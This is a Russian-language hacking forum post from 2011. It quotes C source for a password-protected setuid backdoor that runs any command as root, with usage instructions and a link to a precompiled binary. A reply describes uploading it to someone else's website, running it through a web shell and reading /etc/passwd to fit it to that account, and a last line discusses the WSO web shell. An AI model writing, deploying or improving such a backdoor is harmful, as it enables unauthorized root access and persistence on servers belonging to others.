29.08.2011, 23:31
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Tigger
Код:
#include
#include
main(int argc, char *argv[])
{
if(argc == 3){
if(strcmp(argv[1],"cool_hack") == 0){
setgid(0);
setuid(0);
system(argv[2]);
}
}
return 0;
}
Using: ./suid cool_hack id
[path] [password] [command]
Пароль, разумеется можно изменить. В сурсе видно где
Скомпилируй (хоть на том же шелле с gcc) и используй.
Ну и, разумеется, не забывай уже бинарнику добавлять suid-бит (к примеру chmod 4751 suidfilename).
P.S.:
Скомпилированный суидник
с паролем 112s233
: http://rghost.ru/19777451 Спасибо, сейчас скомпилил, залив на ftp одного сайта(владелец user), сделал chmod 4755, зашел через вебшелл(права apache) - попробовал выполнить суидник - права показываются как апачевские.
Естественно, предварительно я посмотрел в /etc/passwd какие uid и gid у юзверя моего ftp, которые я вписал вместо рутовских нулей.
Почему так?
Сообщение от 1NtR0
WSO не правильно работают на вин ОС, лучше бы это поправили.
Что именно?
|
|
|